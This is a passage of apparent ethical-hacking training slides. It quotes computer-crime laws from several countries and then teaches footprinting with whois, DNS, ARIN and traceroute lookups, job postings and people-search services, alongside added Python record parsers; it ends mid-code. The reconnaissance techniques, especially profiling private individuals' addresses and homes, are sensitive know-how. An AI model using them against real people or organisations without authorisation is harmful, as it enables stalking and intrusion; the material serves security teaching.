(5)(B) by conduct described in clause (i), (ii), or (iii) of subparagraph (A), caused (or, in the case of an attempted offense, would, if completed, have caused)--
Section 1030 (5) (B) (continued)



(i) loss to 1 or more persons during any 1-year period (and, for purposes of an investigation, prosecution, or other proceeding brought by the United States only, loss resulting from a related course of conduct affecting 1 or more other protected computers) aggregating at least $5,000 in value;

(ii) the modification or impairment, or potential modification or impairment, of the medical examination, diagnosis, treatment, or care of 1 or more individuals;

(iii) physical injury to any person; 

(iv) a threat to public health or safety; or 

(v) damage affecting a computer system used by or for a government 
entity in furtherance of the administration of justice, national 
defense, or national security; 
Section 1030 (6) (7)



(6) knowingly and with intent to defraud traffics (as defined in section 1029) in any password or similar information through which a computer may be accessed without authorization, if--

(A) such trafficking affects interstate or foreign commerce; or

(B) such computer is used by or for the Government of the United States;

(7) with intent to extort from any person any money or other thing of value, transmits in interstate or foreign commerce any communication containing any threat to cause damage to a protected computer;
Penalties



(1) (A) a fine under this title or imprisonment for not more than ten years, or both, in the case of an offense under subsection (a)(1) of this section which does not occur after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph; and

(B) a fine under this title or imprisonment for not more than twenty years, or both, in the case of an offense under subsection (a)(1) of this section which occurs after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph;

(2) (A) except as provided in subparagraph (B), a fine under this title or imprisonment for not more than one year, or both, in the case of an offense under subsection (a)(2), (a)(3), (a)(5)(A)(iii), or (a)(6) of this section which does not occur after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph;
Penalties (continued)



© (B) a fine under this title or imprisonment for not more than 5 years, or both, in the case of an offense under subsection (a)(2), or an attempt to commit an offense punishable under this subparagraph, if--

• (i) the offense was committed for purposes of commercial advantage or private financial gain;

• (ii) the offense was committed in furtherance of any criminal or tortious act in violation of the Constitution or laws of the United States or of any State; or

• (iii) the value of the information obtained exceeds $5,000;

© (C) a fine under this title or imprisonment for not more than ten years, or both, in the case of an offense under subsection (a)(2), (a)(3) or (a)(6) of this section which occurs after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph;
Penalties (continued)



(3)(A) a fine under this title or imprisonment for not more than five years, or both, in the case of an offense under subsection (a)(4) or (a)(7) of this section which does not occur after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph; and

(3)(B) a fine under this title or imprisonment for not more than ten years, or both, in the case of an offense under subsection (a)(4), (a)(5)(A)(iii), or (a)(7) of this section which occurs after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph; and
Penalties (continued)



(4)(A) a fine under this title, imprisonment for not more than 10 years, or both, in the case of an offense under subsection (a)(5)(A)(i), or an attempt to commit an offense punishable under that subsection;

(4)(B) a fine under this title, imprisonment for not more than 5 years, or both, in the case of an offense under subsection (a)(5)(A)(ii), or an attempt to commit an offense punishable under that subsection;

(4)(C) a fine under this title, imprisonment for not more than 20 years, or both, in the case of an offense under subsection (a)(5)(A)(i) or (a)(5)(A)(ii), or an attempt to commit an offense punishable under either subsection, that occurs after a conviction for another offense under this section.
Japan's Cyber Laws



Law No. 128 of 1999 (in effect from February 13, 2000)
Fusei access kinshi hou

Article 3. No person shall conduct an act of unauthorized computer access.

(1) An act of making available a specific use which is restricted by an access control function by making in operation a specific computer having that access control function through inputting into that specific computer, via telecommunication line, another person's identification code for that access control function

(2) An act of making available a restricted specific use by making in operation a specific computer having that access control function through inputting into it, via telecommunication line, any information (excluding an identification code) or command that can evade the restrictions placed by that access control function on that specific use
Japan's Cyber Laws



(3) An act of making available a restricted specific use by making in operation a specific computer, whose specific use is restricted by an access control function installed into another specific computer which is connected, via a telecommunication line, to that specific computer, through inputting into it, via a telecommunication line, any information or command that can evade the restriction concerned

Article 4. No person shall provide another person's identification code relating to an access control function to a person other than the access administrator for that access control function or the authorized user for that identification code, in indicating that it is the identification code for which specific computer's specific use, or at the request of a person who has such knowledge, excepting the case where such acts are conducted by that access administrator, or with the approval of that access administrator or of that authorized user

Article 8. A person who falls under one of the following items shall be punished with penal servitude for not more than one year or a fine of not more than 500,000 yen:

(1) A person who has infringed the provision of Article 3, paragraph 1

Article 9. A person who has infringed the provision of Article 4 shall be punished with a fine of not more than 300,000 yen



Copyright © by EC-Council. All Rights reserved. Reproduction is strictly prohibited.



United Kingdom's Cyber Laws 



Computer Misuse Act 1990

(1) A person is guilty of an offense if-

(a) he causes a computer to perform any function with the intent to secure access to any program or data held in any computer,

(b) the access he intends to secure is unauthorized, and

(c) he knows at the time when he causes the computer to perform the function that that is the case.

(2) The intent a person has to have to commit an offense under this section need not be directed at:

(a) any particular program or data,

(b) a program or data of any particular kind, or

(c) a program or data held in any particular computer

(3) A person guilty of an offense under this section shall be liable on summary conviction to imprisonment for a term not exceeding six months or to a fine not exceeding level 5 on the standard scale or to both.
United Kingdom's Cyber Laws



(4) A person is guilty of an offense under this section if he commits an offense under section 1 above ("the unauthorized access offense") with intent

(a) to commit an offense to which this section applies; or

(b) to facilitate the commission of such an offense and the offense he intends to commit or facilitate is referred to below in this section as the further offense

(5) This section applies to offences

(a) for which the sentence is fixed by law; or

(b) for which a person of twenty-one years of age or over (not previously convicted) may be sentenced to imprisonment for a term of five years

(6) It is immaterial for the purposes of this section whether the further offense is to be committed on the same occasion as the unauthorized access offense or on any future occasion.

(7) A person may be guilty of an offense under this section even though the facts are such that the commission of the further offense is impossible.
United Kingdom's Cyber Laws



(8) A person guilty of an offense under this section shall be liable

(a) on summary conviction, to imprisonment for a term not exceeding the statutory maximum or to both; and

(b) on conviction on indictment, to imprisonment for a term not exceeding five years or to a fine or to both

(9) A person is guilty of an offense if -

(a) he does any act which causes an unauthorized modification of the contents of any computer; and -

(b) at the time when he does the act he has the requisite intent and the requisite knowledge.

(10) For the purposes of subsection (1)(b) above the requisite intent is an intent to cause a modification of the contents of any computer and by so doing -

(a) to impair the operation of any computer;

(b) to prevent or hinder access to any program or data held in any computer; or

(c) to impair the operation of any such program or the reliability of any such data
Australia's Cyber Laws



According to CYBERCRIME ACT 2001

The Cybercrime Act 2001 amended the Criminal Code Act 1995 to replace existing outdated computer offences.

A person is guilty of an offence if:

(a) the person causes any unauthorized access to, or modification of, restricted data

(b) the person intends to cause the access or modification

(c) the person knows that the access or modification is unauthorized

(d) one or more of the following applies:

(i) the restricted data is held in a Commonwealth computer

(ii) the restricted data is held on behalf of the Commonwealth

(iii) the access to, or modification of, the restricted data is caused by means of a telecommunications service

Penalty: 2 years imprisonment
Germany's Cyber Laws



Penal Code Section 202a. Data Espionage: 

(1) Any person who obtains without authorization, for himself or for another, data which are not meant for him and which are specially protected against unauthorized access, shall be liable to imprisonment for a term not exceeding three years or to a fine.

(2) Data within the meaning of subsection 1 are only such as are stored or transmitted electronically or magnetically or in any form not directly visible.

Penal Code Section 303a: Alteration of Data

(1) Any person who unlawfully erases, suppresses, renders useless, or alters data (section 202a(2)) shall be liable to imprisonment for a term not exceeding two years or to a fine.

(2) The attempt shall be punishable.
Singapore's Cyber Laws



Chapter 50A: Computer Misuse Act.

Section 3 - (1) Any person who knowingly causes a computer to perform any function for the purpose of securing access without authority, shall be liable on conviction to a fine not exceeding $5,000 or to imprisonment for a term not exceeding 2 years or to both.

(2) If any damage is caused as a result of an offence under this section, a person convicted of the offence shall be liable to a fine not exceeding $50,000 or to imprisonment for a term not exceeding 7 years or to both

Section 4: Access with intent to commit or facilitate commission of offence

(1) This section shall apply to an offence involving property, fraud, dishonesty or which causes bodily harm and which is punishable on conviction with imprisonment for a term of not less than 2 years.

(2) Any person guilty of an offence under this section shall be liable on conviction to a fine not exceeding $50,000 or to imprisonment for a term not exceeding 10 years or to both
Summary



© Security is critical across sectors and industries. 

© Ethical Hacking is a methodology to simulate a 
malicious attack without causing damage. 

© Hacking involves five distinct phases. 

© Security evaluation includes preparation, conduct, and 
evaluation phases. 

© Cyber crime can be differentiated into two categories.

© U.S. Statutes 1029 and 1030 primarily address cyber crime.
Ethical Hacking



Module II
Footprinting 



Scenario 






Adam is furious. He had applied for the network engineer job at targetcompany.com. He believes that he was rejected unfairly. He has a good track record, but the economic slowdown has caused many layoffs, including his. He is frustrated - he needs a job and feels he has been wronged. Late in the evening he decides that he will prove his mettle.

© What do you think Adam would do? 

© Where would he start and how would he go about it? 

© Are there any tools that can help him in his effort? 

© Can he cause harm to targetcompany.com? 

© As a security professional, where can you lay checkpoints and how 
can you deploy countermeasures? 
Module Objectives



© Overview of the Reconnaissance Phase 

© Introducing Footprinting

© Understanding the Information Gathering Methodology of Hackers

© Comprehending the Implications 

© Learning Some of the Tools Used for the 
Reconnaissance Phase 

© Deploying Countermeasures
Revisiting Reconnaissance




© Reconnaissance refers to the preparatory phase where an attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack.

© It involves network scanning, either external or internal, without authorization.






Defining Footprinting



© Footprinting is the blueprinting of the security profile of an organization, undertaken in a methodological manner.

© Footprinting is one of the three pre-attack phases. The others are scanning and enumeration.

© An attacker will spend 90% of the time in profiling an organization and will spend 10% of the time in launching the attack.

© Footprinting results in a unique organization profile with respect to networks (Internet/intranet/extranet/wireless) and systems involved.
Information Gathering Methodology



© Unearth initial information
© Locate the network range
© Ascertain active machines
© Discover open ports/access points
© Detect operating systems
© Uncover services on ports
© Map the network
Unearthing Initial Information



© Commonly includes:

• Domain name lookup

• Locations

• Contacts (telephone/mail)

© Information sources:

• Open source

• Whois

• Nslookup

© Hacking tool: Sam Spade



[Screenshot: Sam Spade script console. Tools menu: Zone Transfer, SMTP Relay check, Scan Addresses, Crawl website, Browse web, Check cancels, Fast traceroute, Slow traceroute, S-lang command, Decode URL, Parse email headers. Toolbar: Ping, nslookup, Whois, IP Block, Dig, Traceroute, Finger, SMTP Verify, Time, Blacklist, Abuse Lookup.]
Finding Company's URL



© Search for a company's URL using a search engine such as www.google.com.

© Type the company's name in the search engine to get the company URL.
Internal URL



© By taking a guess, you may find an internal 
company URL. 

• For example, intranet.xsecurity.com

© You can gain access to internal resources by 
typing an internal URL. 

• For example, beta.example.com 
Extracting Archive of a Website



© You can get information on a company website from the time that it was launched at www.archive.org

• For example, www.eccouncil.org

© You can see updates made to the website, to date.
Google Search for Company's Info.



©Using Google, search company news and press 
releases. 

© From this information, get the company's 
infrastructure details. 
People Search



© People search can be used to find personal information 

• For example http://people.yahoo.com 

• For example, http://www.intellius.com 

© You can get details like residential addresses, contact numbers, date of birth, change of location, etc.

© You can get satellite pictures of private residences. 
People Search Website

[Screenshot: sample Intelius background report page (dated April 25, 2005) for a fictitious subject, listing name, aliases, address, date of birth and age, and the available reports: Address History, Single State Criminal Check, Single State Civil Judgments, Neighbor Report, Relatives and Associates Report, Property Information, Neighborhood Report, Federal License Check.]
Satellite Picture of a Residence




http://www.bestpeoplesearch.com

(For reference only - This slide is not in your courseware)

[Screenshot: BestPeopleSearch.com home page, offering people searches by name, by phone number, by address and by cell phone number, including reverse lookups, employment searches and searches with or without SSN, carried out by licensed private investigators.]
http://www.peoplesearchamerica.com

(For reference only - This slide is not in your courseware)

[Screenshot: peoplesearchamerica.com home page, offering phone, cellular and VOIP number research, reverse address and driver license searches, property and background searches, and people reports.]
http://www.datatraceusa.com

(For reference only - This slide is not in your courseware)

[Screenshot: Data Trace USA home page, offering phone trace, identity trace and other trace services to banks, collection agencies, law enforcement and credit card companies.]
http://www.switchboard.com

(For reference only - This slide is not in your courseware)

[Screenshot: Switchboard white pages search form with first name, last name, city, state and zip fields, plus find-a-business, find-a-person, search-by-phone, area and zip code and maps/directions tabs.]
http://www.discreetresearch.com

(For reference only - This slide is not in your courseware)

[Screenshot: discreetresearch.com home page, listing people searches (SSN trace, name match, PO box trace, date of birth and employment locates), business searches, civil records, and phone searches such as name and address from unlisted, disconnected, toll-free, pager or cell numbers.]
Footprinting Through Job Sites



© Company infrastructure details can be gathered from job postings.

• E.g., www.jobsdb.com

© Job requirements
© Employee profile
© Hardware information
© Software information
Footprinting Through Job Sites

[Screenshot: JobsDB.com home page with job seeker login, quick search, jobs by country and by category, and career tips.]
Footprinting Through Job Sites

Designation: System Administrator / DBA (Position is based in U.S.A.)

Job Description: This position is based in Long Beach, CA

* We are looking for a System Administrator cum DataBase Administrator, who can take care of one of our Existing Accounts.

* The Major role would be to do System Software Installations, Configurations and Monitoring the impact of building out of a number of environments from scratch.

* Major interaction of this profile would be with QA Lead / Team in Deploying the code from one to another environment.
Duration: 9 Months

Desired Profile:

1) Strong AIX & Solaris System Admin Skills

2) Should be proficient in UNIX scripting and manual commands

3) WebSphere ADMIN v5 required

4) Configuration Management Tool experience (PVCS, CVS, etc.)

5) Code deployment from one environment to another; Perl Scripting

6) Experience working with Hosting provider

** The perfect choice would be somebody who has experience in production environment with a Corporate Portal.
Plus:

* Certifications

* Vignette a huge plus

* Quality assurance on a WebSphere project
* Vignette release management

* Load testing tools (Mercury preferred.)

Minimum Experience: 2 years
Passive Information Gathering



© To understand the current security status of a particular Information System, organizations perform either a Penetration Test or other hacking techniques.

© Passive information gathering is done by finding out the details that are freely available over the Internet and by various other techniques without directly coming in contact with the organization's servers.

© Organizational and other informative websites are the exception: browsing them does touch the organization's servers, but this information gathering activity looks like ordinary visitor traffic and does not raise suspicion
Competitive Intelligence Gathering



"Business moves fast. Product cycles are measured in months, not years. 
Partners become rivals quicker than you can say 'breach of contract.' So how 
can you possibly hope to keep up with your competitors if you can't keep an 
eye on them?" 

© Competitive intelligence gathering is the process of gathering information about your competitors from resources such as the Internet

© Competitive intelligence is non-interfering and subtle in nature

© Competitive intelligence is both a product and a process
Competitive Intelligence Gathering (cont.)



© The various issues involved in competitive 
intelligence are: 

• Data gathering 

• Data analysis 

• Information verification

• Information security

© Cognitive hacking: 

• Single source 

• Multiple source 
Competitive Intelligence Resource (www.ciseek.com)

[Screenshot: CISeek.com, "The CI Resource Index", a search engine and categorized listing of competitive intelligence resources: associations, books, companies (consulting, market research, online information and databases), education, documentation, publications, software, and a CI news feed.]
Anacubis

• The competitive intelligence product Anacubis allows the user to quickly locate all the information they need and produce a single view of that information for analysis.

• This helps highlight areas of potential threat or opportunity, and competitors that warrant further scrutiny.

http://www.anacubis.com
Public and Private Websites

• A company might maintain public and private websites for different levels of access.

• Footprint an organization's public www servers

  - Example:
    - www.xsecurity.com
    - www.xsecurity.net

• Footprint an organization's sub domains (private)

  - Example:
    - http://partners.xsecurity.com
    - http://intranet.xsecurity.com
    - http://channels.xsecurity.com
    - http://www2.xsecurity.com
Hacking Tools

• Whois
• Nslookup
• ARIN
• NeoTrace
• Visual Route Trace
• SmartWhois
• eMailTrackerPro
• Website Watcher
Whois Lookup

• With a whois lookup, you can get personal and contact information.

For example, www.samspade.com

[Screenshot: a Sam Spade whois result for a domain, showing the registrant contact fields (organization, street, city, phone, e-mail), the registrar and the created/updated dates]
Whois

[Screenshot: whois record for targetcompany (targetcompany-DOM), Ameerpet, Hyderabad, Andhra Pradesh, with the administrative and technical contact names, e-mail addresses and phone numbers partially masked; record created on 13-Oct-1997]

The same record with its values replaced by placeholders:

Registrant:
   targetcompany (targetcompany-DOM)
   # Street Address
   City, Province
   State, Pin, Country

Domain Name: targetcompany.COM

Administrative Contact:
   Surname, Name (SNIDNo-ORG) targetcompany@domain.com
   targetcompany (targetcompany-DOM) # Street Address
   City, Province, State, Pin, Country
   Telephone: XXXXX Fax XXXXX

Technical Contact:
   Surname, Name (SNIDNo-ORG) targetcompany@domain.com
   targetcompany (targetcompany-DOM) # Street Address
   City, Province, State, Pin, Country
   Telephone: XXXXX Fax XXXXX

Domain servers in listed order:
   NS1.WEBHOST.COM   XXX.XXX.XXX.XXX
   NS2.WEBHOST.COM   XXX.XXX.XXX.XXX
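As an added example (not code from the course), the following Python parses a whois record laid out like the template above and summarises what it publishes: the domain, name servers, expiry date, and every e-mail address and phone number per contact section. It is written for a defender reviewing an organisation's own registration; the record is a constructed sample with placeholder values.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the layout of the template record above; every
# value is a placeholder, not real registration data.
SAMPLE_WHOIS = """\
Registrant:
   targetcompany (targetcompany-DOM)
   1 Example Street
   Hyderabad, Andhra Pradesh
   500038, IN

   Domain Name: TARGETCOMPANY.COM

   Administrative Contact:
      Surname, Name (SNIDNO-ORG) j.surname@targetcompany.example
      targetcompany (targetcompany-DOM) 1 Example Street
      Hyderabad, Andhra Pradesh 500038, IN
      Telephone: +91 40 0000 0000 Fax: +91 40 0000 0001
   Technical Contact:
      Surname, Name (SNIDNO-ORG) hostmaster@webhost.example
      Webhost Inc
      Telephone: +1 408 000 0000

   Record expires on 14-Oct-2008.
   Record created on 13-Oct-1997.

   Domain servers in listed order:
      NS1.WEBHOST.COM   192.0.2.10
      NS2.WEBHOST.COM   192.0.2.11
"""

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
PHONE_RE = re.compile(r"\+?\d[\d\s-]{7,}\d")
SECTION_RE = re.compile(r"^\s*([A-Za-z ]+Contact|Registrant)\s*:\s*$")


@dataclass
class WhoisSummary:
    domain: str = ""
    expires: str = ""
    nameservers: list = field(default_factory=list)
    emails: dict = field(default_factory=dict)   # section -> [addresses]
    phones: dict = field(default_factory=dict)   # section -> [numbers]


def parse_whois(text: str) -> WhoisSummary:
    """Walk the record line by line, remembering which section we are in."""
    summary = WhoisSummary()
    section, in_ns = "header", False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SECTION_RE.match(line)
        if m:
            section, in_ns = m.group(1), False
            continue
        lower = line.lower()
        if lower.startswith("domain name:"):
            summary.domain = line.split(":", 1)[1].strip().lower()
        elif lower.startswith("record expires on"):
            summary.expires = line.split("on", 1)[1].strip(" .")
        elif lower.startswith("domain servers"):
            in_ns = True
        elif in_ns:
            summary.nameservers.append(line.split()[0].lower())
        for address in EMAIL_RE.findall(line):
            summary.emails.setdefault(section, []).append(address.lower())
        # Only scan lines that announce a number, so postal codes and
        # handles are not mistaken for phone numbers.
        if "telephone" in lower or "fax" in lower:
            for number in PHONE_RE.findall(line):
                summary.phones.setdefault(section, []).append(number.strip())
    return summary


def exposure_report(summary: WhoisSummary) -> list:
    """Human-readable findings about personal data the record publishes."""
    findings = []
    role_prefixes = ("admin", "hostmaster", "dns", "noc", "abuse")
    for section, addresses in summary.emails.items():
        for address in addresses:
            if not address.split("@")[0].startswith(role_prefixes):
                findings.append(f"{section}: personal-looking address {address}")
    for section, numbers in summary.phones.items():
        findings.append(f"{section}: {len(numbers)} phone number(s) published")
    if len(summary.nameservers) < 2:
        findings.append("fewer than two name servers listed")
    return findings
```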
Nslookup

• http://www.btinternet.com/~simon.m.parker/IP-utils/nslookup_download.htm

• Nslookup is a program to query Internet domain name servers. It displays information that can be used to diagnose Domain Name System (DNS) infrastructure.

• It helps find additional IP addresses if the authoritative DNS server is known from whois.

• The MX record reveals the IP of the mail server.

• Both Unix and Windows come with an nslookup client.

• Third-party clients are also available, for example Sam Spade.
Extract DNS information

• Using www.dnsstuff.com, you can extract DNS information such as:

  - Mail server extensions
  - IP addresses

[Screenshot: the www.DNSstuff.com front page, with its lookup forms (DNS lookup, WHOIS, traceroute, IP information and others), each with an input box and a Lookup button]
Snapshot

DNS Lookup: eccouncil.org MX record (www.DNSstuff.com)

[Screenshot: the lookup is resolved step by step. Searching for the eccouncil.org MX record at a root server gives a referral to the .org TLD servers; the TLD server gives a referral to AUTH2.NS.NYI.NET, which reports the answer.]

Answer:

Type  Class  TTL   Data
MX    IN     3600  mail.eccouncil.org. [Preference = 5]
NS    IN     3600  auth2.ns.nyi.net.
NS    IN     3600  auth1.ns.nyi.net.
A     IN     3600  (address not legible in the screenshot)

To see the DNS traversal, to make sure that all NS servers are reporting the correct results, you can click here. Note that these results are obtained in real-time, meaning that these are not cached results. These results are what DNS resolvers all over the world will see (except those that have cached information).
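To show what a tool such as nslookup or the DNSstuff lookup above actually sends and receives, here is an added Python example (not part of the course material) that builds an MX query for eccouncil.org in DNS wire format and parses a locally constructed response modelled on the snapshot's answer (preference 5, mail.eccouncil.org, TTL 3600). The mail server's address in the constructed reply is a documentation-range placeholder, since it is not legible in the snapshot; no network access is needed.

```python
import struct

TYPE_A, TYPE_NS, TYPE_MX = 1, 2, 15


def encode_name(name: str) -> bytes:
    """Encode a domain name as length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name: str, qtype: int, txid: int = 0x1234) -> bytes:
    """12-byte header (flags 0x0100 = recursion desired) plus one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def decode_name(msg: bytes, offset: int):
    """Decode a name at offset, following compression pointers (top bits 11).

    Returns (name, offset just past the name as written at `offset`). The hop
    limit stops a malformed message with looping pointers from hanging us.
    """
    labels, end, jumped, hops = [], offset, False, 0
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            if not jumped:
                end = offset + 2
            offset = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            jumped = True
            continue
        offset += 1
        if length == 0:
            if not jumped:
                end = offset
            return ".".join(labels), end
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length


def parse_response(msg: bytes):
    """Return (txid, rcode, records); each record is a dict."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    offset = 12
    for _ in range(qd):                      # skip the echoed question
        _, offset = decode_name(msg, offset)
        offset += 4
    records = []
    for _ in range(an + ns + ar):
        name, offset = decode_name(msg, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlen]
        rec = {"name": name, "type": rtype, "ttl": ttl}
        if rtype == TYPE_MX:
            rec["preference"] = struct.unpack("!H", rdata[:2])[0]
            rec["exchange"], _ = decode_name(msg, offset + 2)
        elif rtype == TYPE_NS:
            rec["target"], _ = decode_name(msg, offset)
        elif rtype == TYPE_A:
            rec["address"] = ".".join(str(b) for b in rdata)
        records.append(rec)
        offset += rdlen
    return txid, flags & 0x000F, records


def build_sample_response(query: bytes) -> bytes:
    """Constructed reply modelled on the snapshot: MX 5 mail.eccouncil.org, TTL 3600.

    The additional A record carries a documentation-range placeholder address.
    """
    txid = struct.unpack("!H", query[:2])[0]
    question = query[12:]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 1)  # QR, RD, RA; 1 answer, 1 additional
    owner = b"\xC0\x0C"                       # pointer to the question name at offset 12
    exchange = b"\x04mail" + owner            # "mail" + pointer = mail.eccouncil.org
    mx_rdata = struct.pack("!H", 5) + exchange
    answer = owner + struct.pack("!HHIH", TYPE_MX, 1, 3600, len(mx_rdata)) + mx_rdata
    mail_off = 12 + len(question) + len(owner) + 10 + 2   # where "\x04mail" sits
    ptr_mail = struct.pack("!H", 0xC000 | mail_off)
    extra = ptr_mail + struct.pack("!HHIH", TYPE_A, 1, 3600, 4) + bytes([192, 0, 2, 25])
    return header + question + answer + extra


def mail_servers(records) -> list:
    """Exchanges from MX records, lowest preference first (tried first)."""
    mx = [r for r in records if r["type"] == TYPE_MX]
    return [r["exchange"] for r in sorted(mx, key=lambda r: r["preference"])]
```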
Scenario (cont.)

Adam knows that targetcompany is based in NJ. However, he decides to check it. He runs a whois from an online whois client and notes the domain information. He takes down the email IDs and phone numbers. He also discerns the domain server IPs and does an interactive nslookup.

• Ideally, what information should be revealed to Adam during this quest?

• Are there any other means of gaining information? Can he use the information at hand in order to obtain critical information?

• What are the implications for the target company? Can he cause harm to targetcompany at this stage?
Locate the Network Range

• Commonly includes:

  - Finding the range of IP addresses
  - Discerning the subnet mask

• Information sources:

  - ARIN (American Registry for Internet Numbers)
  - Traceroute

• Hacking tools:

  - NeoTrace
  - Visual Route

[Screenshot: a visual traceroute in map view with its hop table (columns Name, RT (ms), Network, Graph). Hops 9 to 20 pass through AboveNet routers (mfnx.net) and then Cogent routers (atlas.cogentco.com, network COGENT-NB-0000) with response times between about 320 and 470 ms]
ARIN

• http://www.arin.net/whois/

• ARIN allows searches on the whois database to locate information on networks, autonomous system numbers (ASNs), network-related handles, and other related points of contact (POC).

• ARIN whois allows querying the IP address to help find information on the strategy used for subnet addressing.
American Registry for Internet Numbers

"Applying the principles of stewardship, ARIN, a nonprofit corporation, allocates Internet Protocol resources; develops consensus-based policies; and facilitates the advancement of the Internet through information and educational outreach"

[Screenshot: the ARIN.NET home page, with sections for the Database & Template Conversion Information Center, Registration (how to get IPv4 and IPv6 addresses, AS Numbers, and Transfer, Help Desk and Reassignment information), Meetings (upcoming ARIN meetings and sponsorship information, minutes from previous AC, BOT, PPM and Member's meetings), Library, Policy (how ARIN policy is made, current policy discussions and the policy proposal archive), Membership (member benefits, how to join as a non-subscriber, list of ARIN members) and Internet Info]
Screenshot: ARIN Whois Output

Output from ARIN Whois

Search results for: 207.46.230.218

Microsoft (NETBLK-MICROSOFT-GLOBAL-NET)
   One Redmond Way
   Redmond, WA 98052
   US

   Netname: MICROSOFT-GLOBAL-NET
   Netblock: 207.46.0.0 - 207.46.255.255

   Coordinator:
      Microsoft (ZH39-ARIN) noc@microsoft.com
      425-936-4200

   Domain System inverse mapping provided by:

   DNS1.CP.MSFT.NET   207.46.138.20
   DNS2.CP.MSFT.NET   207.46.138.21
   DNS1.TK.MSFT.NET   207.46.232.37

ARIN allows searches on the whois database to locate information on networks, autonomous system numbers (ASNs), network-related handles, and other related points of contact (POC).
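The Netblock line is what answers both questions on the "Locate the Network Range" slide: the range of IP addresses and the subnet mask. As an added example (not from the course), this Python parses an ARIN-style record modelled on the output above, converts the range into CIDR prefixes and masks with the standard ipaddress module, and checks which addresses fall inside the block, which is also how a defender can spot hosts that sit outside the organisation's registered range.

```python
import ipaddress
import re

# Constructed sample in the layout of the ARIN whois output above; the
# addresses are the ones shown in the screenshot.
SAMPLE_ARIN = """\
Search results for: 207.46.230.218

Microsoft (NETBLK-MICROSOFT-GLOBAL-NET)
   One Redmond Way
   Redmond, WA 98052
   US

   Netname: MICROSOFT-GLOBAL-NET
   Netblock: 207.46.0.0 - 207.46.255.255
"""

NETBLOCK_RE = re.compile(
    r"Netblock:\s*(\d{1,3}(?:\.\d{1,3}){3})\s*-\s*(\d{1,3}(?:\.\d{1,3}){3})")


def parse_netblock(record: str):
    """Return (first, last) IPv4Address objects from the record's Netblock line."""
    m = NETBLOCK_RE.search(record)
    if m is None:
        raise ValueError("record has no Netblock line")
    first = ipaddress.IPv4Address(m.group(1))
    last = ipaddress.IPv4Address(m.group(2))
    if last < first:
        raise ValueError("Netblock end precedes its start")
    return first, last


def range_to_cidrs(first, last) -> list:
    """Smallest set of CIDR prefixes that exactly covers first..last.

    A registry range need not be a single prefix: 192.0.2.16 - 192.0.2.47,
    for instance, needs two /28s. Accepts address objects or strings.
    """
    first, last = ipaddress.IPv4Address(first), ipaddress.IPv4Address(last)
    return list(ipaddress.summarize_address_range(first, last))


def describe_netblock(record: str) -> dict:
    """Prefixes, subnet masks and address count for the record's netblock."""
    first, last = parse_netblock(record)
    nets = range_to_cidrs(first, last)
    return {
        "cidrs": [str(n) for n in nets],
        "netmasks": [str(n.netmask) for n in nets],
        "addresses": int(last) - int(first) + 1,
    }


def in_netblock(record: str, ip: str) -> bool:
    first, last = parse_netblock(record)
    return first <= ipaddress.IPv4Address(ip) <= last


def outside_netblock(record: str, addresses) -> list:
    """Addresses from an inventory or log that fall outside the registered block.

    Useful on the defending side to find systems that are not covered by the
    organisation's own registered range.
    """
    return [a for a in addresses if not in_netblock(record, a)]
```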
Traceroute

• Traceroute works by exploiting a feature of the Internet Protocol called TTL, or Time To Live.

• Traceroute reveals the path IP packets travel between two systems by sending out consecutive sets of UDP or ICMP packets with ever-increasing TTLs.

• As each router processes an IP packet, it decrements the TTL. When the TTL reaches zero, that router sends back a "TTL exceeded" message (using ICMP) to the originator.

• Routers with reverse DNS entries may reveal the names of routers, network affiliation, and geographic location.
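As an added example (not course code), this Python simulates the TTL mechanism just described: a constructed path of routers, each decrementing the TTL, with the router that brings it to zero answering "time exceeded". It also models a hop that filters ICMP (shown as "*" in real tools) and derives the network-affiliation hint from each router's reverse DNS name. All addresses and names are placeholders.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Router:
    ip: str
    rdns: Optional[str] = None     # reverse DNS name, if the operator set one
    silent: bool = False           # drops expired probes without an ICMP reply


@dataclass
class Path:
    """Constructed network: the routers between us and the destination, in order."""
    routers: List[Router]
    destination: Router


def forward(path: Path, ttl: int) -> Tuple[Optional[str], Optional[str]]:
    """Carry one probe along the path and return (reply kind, replying IP).

    Every router decrements the TTL; the one that brings it to zero discards
    the probe and, unless it is silent, answers with ICMP "time exceeded".
    A probe that survives all routers reaches the destination, which replies.
    """
    for router in path.routers:
        ttl -= 1
        if ttl == 0:
            return (None, None) if router.silent else ("time-exceeded", router.ip)
    return "reply", path.destination.ip


def traceroute(path: Path, max_hops: int = 30) -> List[Tuple[int, Optional[str]]]:
    """Probe with TTL 1, 2, 3, ... until the destination itself answers."""
    hops = []
    for ttl in range(1, max_hops + 1):
        kind, ip = forward(path, ttl)
        hops.append((ttl, ip))          # None is what real tools print as '*'
        if kind == "reply":
            break
    return hops


def affiliation(name: Optional[str]) -> Optional[str]:
    """Registered domain of a reverse DNS name: the 'who runs this hop' hint."""
    if not name:
        return None
    return ".".join(name.split(".")[-2:])


def annotate(path: Path, hops) -> list:
    """Pair each hop with its reverse DNS name and inferred network affiliation."""
    names = {r.ip: r.rdns for r in path.routers + [path.destination]}
    out = []
    for ttl, ip in hops:
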